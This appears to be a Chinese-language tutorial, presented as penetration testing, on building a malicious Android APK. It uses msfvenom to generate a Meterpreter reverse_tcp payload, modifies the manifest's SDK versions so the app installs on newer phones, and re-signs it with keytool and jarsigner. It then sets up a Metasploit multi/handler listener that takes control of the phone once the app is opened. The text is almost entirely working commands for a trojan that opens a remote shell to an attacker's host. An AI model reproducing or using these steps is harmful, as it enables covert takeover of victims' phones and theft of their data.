一、生成木马
1、利用kali自带的msf生成木马文件
msfvenom -p android/meterpreter/reverse_tcp LHOST=XX.XX.XX.XX LPORT=5555 R > exp.apk
2、下载apk到手机安装
3、解决木马程序问题
①旧版本问题
手机为MIUI13,出现报错此应用专为旧版android打造(无截图)
查询资料后发现主要原因为SDK版本问题,反编译进行修改
在AdnroidManifest.xml文件<application>标签上方添加
<uses-sdk android:targetSdkVersion="23" android:minSdkVersion="16"/>
重新编译,找到apk文件并改名
②重签名问题
下载后安装,报错103,需要重新签名
重签名过程
1、生成签名证书
keytool -genkey -alias test -keyalg RSA -keystore mykey.jks
/*解释:keytool工具是Java JDK自带的证书工具
-genkey参数表示:要生成一个证书(版权、身份识别的安全证书)
-alias参数表示:证书别名 test
-keyalg RSA表示加密类型,RSA表示需要加密,以防止别人盗取
-keystore myKey.jks表示要生成的证书名称为myKey.jks
*/
2.重签名
jarsigner -verbose -keystore mykey.jks -signedjar exp-out.apk exp-change.apk test
四、渗透测试
1、开启msf
msfconsole
2、选定监听模块
use exploit/multi/handler
3、设置相关参数
set payload android/meterpreter/reverse_tcp
set lhost XX.XX.XX.XX
set lport XXXX
4、启动
run
5、手机上点击app图标,开启应用,后台成功捕获目标
获取相关信息,成功渗透
其他相关指令请查看help
五、木马跑死
此时执行其他指令时出现超时等报错,原因为安卓设备未提供相关权限,或后台进程被杀死